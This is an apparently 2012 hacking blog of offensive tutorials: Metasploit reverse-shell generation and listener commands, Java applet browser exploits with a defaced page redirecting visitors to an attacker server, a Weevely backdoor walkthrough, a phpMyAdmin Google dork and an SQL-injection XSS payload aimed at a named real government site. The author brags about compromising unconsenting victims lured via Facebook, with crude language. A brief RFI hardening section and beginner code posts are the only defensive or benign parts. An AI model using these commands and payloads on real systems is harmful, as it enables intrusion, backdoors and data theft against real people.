Our Feeds

Tuesday 30 October 2012

Ajith KP

Python Directory, Admin Page, phpMyAdmin and Shell Scanner

Hi guyzzz long after I have made a new tool to scan Directory, Admin Page, phpMyAdmin, and Shell in Python.

It will works in LINUX OS. It is hard to run in WINDOWS because text color will make problems in WINDOWS.

Download Link: https://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html



Hope you like this... Please write your comments....








Monday 29 October 2012

Ajith KP

phpMyAdmin DB --> Google Dork

some of foolish admins have forgot to hide phpMyAdmin.

We can use this vulnerability to pWn database directy without using other exploits like SQLi.

We can obtain DB directly.

Google Dork: inurl:"index.php?db=information_schema"























Look the bellow image how phpMyAdmin looks...
Lets pWn DataBase....






Saturday 27 October 2012

Ajith KP

"r00t"ing server with WEEVELY

WEEVELY is a python application which helps hacker to backdoor server and r00ting.

Download : http://cloud.github.com/downloads/epinna/Weevely/weevely-0.7.1.tar.gz

Generating BackDoor[PHP]

terminal@terminal:~/weavely$ python ./weevely.py generate ajithkp

[python ./weevely.py generate <password> --> here ajithkp is my password]


Getting "TERMINAL" to r00t

Upload generated PHP shell to server.
Eg. http://shelled.com/path/to/the/reverse.php

Execute command in your terminal,

terminal@terminal:~/weavely$ python ./weevely.py http://shelled.com/path/to/the/reverse.php ajithkp

[python ./weevely.py <urltobackdoor> <password>]


























After successfully connected...


























  I'm going to execute whoami

 Now going to change Current Directory to /home/
$ cd /home/
$ ls -al


Hope you will like this hacking tutorial... Happy r00ting... I'm not like to r00t server and mass deface now... I Love only to breach security,,, Fuck Security!!!!!
Ajith KP

DirDictionaryBruter Directory and Files Brute Forcer

This simple python application will help to find the unlinked files in server.
You need a best Dictionary and save it as "DirList" in same directoty of python file.

Run it by,

python ./DirBrute.py

Input  the URL which you need to brute force direcories.

It will save the founded files and directories logs in "DirLogs.log"

Open it and read that. It will help you to find hidden juicy files such as admin pages, text files, Uploaded PHP Shells, etc.

Fun with it...


































Source Code


Wednesday 24 October 2012

Ajith KP

PHP Reverse Shell [Edited]

[NOTE : This is not coded by me. The real code is generated by Metasploit. I have Just edited to add some features]
Guyzzz I have edited the PHP reverse shell which generated by Metasploit. I have added feature to find IP Address of attacker automatically. Now it is awesome in working because we don't want change the IP Address in PHP script, if your IP Address is dynamic.

Tuesday 23 October 2012

Ajith KP

Generate Reverse Shells using Metasploit

 Metasploit comes with some built-in Reverse Shells generating power. You can easily create Reverse shells with very small commands.

PHP Reverse Shell


PHP reverse Shell can be create a small command.

  1. Open Terminal in your Linux OS
  2. Copy the bellow command and execute this command. Thats all for generate PHP Reverse Shell

Note:

  Replace LHOST=117.235.152.218 LPORT=5600 with your IP Address and Your Favorite Port [Use any ports other than reserved ports like 80, 8080, 23, etc]






[Note: reverse_perl.pl is created by another command. Here we don't want to use this.]
Upload reverse.php to any server.


 [Download this CommandExecutor & Uploader from here ]


Open Uploaded reverse.php in your favourite Web Browser.


Accept Reverse Connect  Using Metasploit

Open Metasploit Console.

msf > use multi/handler
msf  exploit(handler) > set LHOST 117.235.152.218
LHOST => 117.235.152.218
msf  exploit(handler) > set LPORT 5600
LPORT => 5600
msf  exploit(handler) > exploit -z -j

After Successfully connected you can execute "shell" for pWn targets Terminal. Then r00t your targets.



Thursday 18 October 2012

Ajith KP

Java Applet Field Bytecode Verifier Cache Remote Code Execution with Social Engineering

Guyz Browser AutopWn using this metasploit module is very easy. It is also new threat in cyber world.

Open Metasploit Console.

msf > use exploit/multi/browser/java_verifier_field_access



msf  exploit(java_verifier_field_access) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Mac OS X PPC (Native Payload)
   3   Mac OS X x86 (Native Payload)
   4   Linux x86 (Native Payload)






msf  exploit(java_verifier_field_access) > set LHOST 117.231.34.82
LHOST => 117.231.34.82
msf  exploit(java_verifier_field_access) > set LPORT 560
LPORT => 560
msf  exploit(java_verifier_field_access) > set URIPATH /
URIPATH => /
msf  exploit(java_verifier_field_access) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 117.231.34.82:560
msf  exploit(java_verifier_field_access) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://117.231.34.82:8080/
[*] Server started.

Yes we have set up a malicious server at http://117.231.34.82:8080/

I have already hacked a server.

I added a deface page "pirr.html" with a JavaScript

<SCRIPT language="javascript">window.location="http://117.231.34.82:8080/";</SCRIPT>




It will redirect the victim to to my malicious server :p

I shared the deface page link in my facebook. [Social Engineering :p]





Yes I got two victim to F*cK.

I select 2nd victim to pWn... MmMmMm....


sessions -i 2
meterpreter> sysinfo
computer : xxxxxxx
os : xxxxxxx
meterpreter: java/java
meterpreter> shell





Yes my pen*s have touched her a*s.

meterpreter> pwd
/home/xxxxxxxx


meterpreter> ls -al


Yes it penetrated into there.
Now I pWned here.


Guyz if you like this post please post your comments... :)

Saturday 13 October 2012

AJITH KP

Java Signed Applet Remote Code Execution with Metasploit

This is the new threat in cyber world. [Metasploit]

It enables Hacker to execute commands in victims computer.

Here I have made a tutorial to hack PC using this vulnerability.

You need tho install the module. I'm not going to describe how to install module.

Open Metasploit Console.

Input command,

>use exploit/multi/browser/java_signed_applet


First step over, now you need to set up malicious server in your PC

Find you IP address as first step to set up malicious server.

Open Command Prompt and execute command ipconfig 
[For Linux User ifconfig]



Next execute a series of commands in Metasploit Console.

>set LHOST 117.230.54.146
>set LPORT 560
>set URIPATH ajithkp560
>set TARGET 0
>exploit -j

Yes We have set up Malicious Server  at http://117.230.54.146:8080/ajithkp560 :)


Yeah now Metasploit have started to seek the victim for connect.

This Image is taken by me without using the command set URI ajithkp560

Yes Victim will connect if he run the Bytecode Verifier. :p

Yes we have done....



>sessions -i 1

This command is for connect to First Victim who connected to your malicious server.
Now we have connected to first victim :p


Yo... Baby we have connected to our victim.

Next command is for access the Command Prompt of victim :p

>execute -H -i -f "cmd"

Yo... Yo... pWned Command Prompt of victim :p


Now I'm going to Change Directory to E:\

>e:\
>dir

Guyz I have spend my 1 hour to create this tutorial and pWn victim. So please spend your 10 seconds to write your comments...

Friday 12 October 2012

AJITH KP

Domain Watcher

It is the PHP application which will help you to find out the domains and users hosted in shelled server.

But it can not SYM link the server. We are recommending "Mannu Shell" by IndiShell for SYM Link.

Just for watch the domains and their owners.




























Code:



Note: This application is not fully coded by mE...
AJITH KP

Java Applet : Your First Program

Java Applet is an web applications programming language. It is very easy to study and also easy to program. Here I would like to create a simple Java Applet which have black background and green text color. You need to save this as FirstApplet.java  

Code: 

 Compile this to bytecode using command "javac FirstApplet.java". After success full compilation yo will get a class file named FirstApplet.class

Next you need to create a HTML page for run this applet

Code: 



Save the above code as any name as you wish. But it must have an extension of HTML.

Now open this html page in your favorite  browser


Wednesday 10 October 2012

Ajith KP

C Program to print increasing of "*"

It is an program to teach "for loop" for starters. Here code

Code


It is not a pro codes... It is only a starters code.
Ajith KP

RFI Vulnerability: Arises and Defence

RFI is a type of attack which attacker tried to execute PHP commands. I have explained both Remote Command and Code execution in previous post. Read here

The bellow code is an example of RFI enabled PHP page.



Save this as page.php and open the URL,

http://localhost/path/to/page.php?page=http://www.terminalcoders.blogspot.in

you can see the http://www.terminalcoders.blogspot.in opened in your browser on localhost.

Some Protection methods

To protect from RFI with simple way edit the php.ini file. Open php.ini in editor. Find allow_url_fopen and allow_url_include and change from on to off . It will resist the page from inclusion of remte page...

Edit php.ini and change from on to off register_globals, and use E_STRICT to find uninitialized variables.

Next is editing of .htaccess in apache server. Copy the bellow code and add this to .htaccess



It will redirect the malicious query  included request to the http://www.terminalcoders.blogspot.in

Sunday 7 October 2012

Ajith KP

AJJA Command Executor

Guyzzz we have coded a simple command executor shell in PHP. Look a while this shell.


Source Code

Thursday 4 October 2012

Ajith KP

Remote Command 'N Code Execution with Examples

Guyzzz welcome to _TERMINAL_CODERS_ Here I would like to explain Remote Command and Remote Code Execution attacks with examples.      We can execute remote commands with two different methods.
  • Exec : We can execute commands in remote machine. But the string result or the steps with string cannot able to see. But command will executed there.
  • Passthru : we can execute command and also the result is enable to see.

Remote Command Execution  

Remote Command Execution attack is a type of attack which attacker can execute "System Commands" in Remote Machine.
An example of remote command execution with Exec method is LFI [Local File Inclusion]. Lets start LFI with examples. LFI vulnerability arises when programmer includes further pages or data without properly sanitizing it.
Create a PHP file withbellow code,
Code: 
 


Save the above code as "index.php".

Next create another PHP file with bellow code,

Code:


Save the bellow as "contact.php".

Next create another PHP page with bellow code,

Code:


Save this as "file.php".

The file "file.php" havent declared the file perfectly.

So lets open "index.php" in your browser.


 


















The file.php have started with index.php Now change the URL to "http://localhost/LFI/file.php?file=contact.php"



















Now it have opened contact.php It is the vulnerability of LFI. Read Hack with LFI Vulnerabily Devil'sCafe


Next remote command execution with "passthru" method.

Create a PHP File with bellow code,

Code:


Save the code as "cmd.php".

Open it in browser. But you cannot see anything here.
Change the URL to "http://localhost/cmd/cmd.php?cmd=dir"
 [I'm using Windows OS. So I use Windows System Command].

You will get result as bellow image.



















Remote Code Execution  

Unlike Remote Command Execution, Remote Code Execution is an attack with execution of PHP command in Remote Machine. An example of Remote Code Execution is "RFI"[Remote File Inclusion].

Copy the bellow code,

Code:


Save it as "page.php"

Open it in your browser. You can see head "_TERMINAL_CODERS_"

Now cange the URL to,
"http://localhost/RFI/page.php?page=http://www.terminalcoders.blogspot.in"



















Guyzzz I have spend about half an hour to create this tutor...
Please spend your 30 seconds to add your comments...

Wednesday 3 October 2012

AJITH KP

XSS via SQL Injection


Hello Guys. You can use SQLi instead of XSS injection. Yes it is a simple trick.

[0x01] You got SQLi vulnerability in website
http://www.vulnerable.com/index.php?id=560

[0x02] Next count the columns. You got 5 columns and column 3 is 
vulnerable.

[0x03] Next encode your JavaScript to HexaDecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexa decimal value is 3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e

[0x04] Insert the hexa decimal value into group_concat function.
That is now use URL 

www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5

 
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1,2,3,group_concat%280x3c7363726970743e616c6572742822416a69746820274e20416a6d616c22293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14 

[0x05] By Team AJJA[Ajith Kp | Jhelai Sahadevan | Jitendra Singh | Ajmal Joshi] Hope You Like this trick... if you share this in your blogs please add my link to this blog...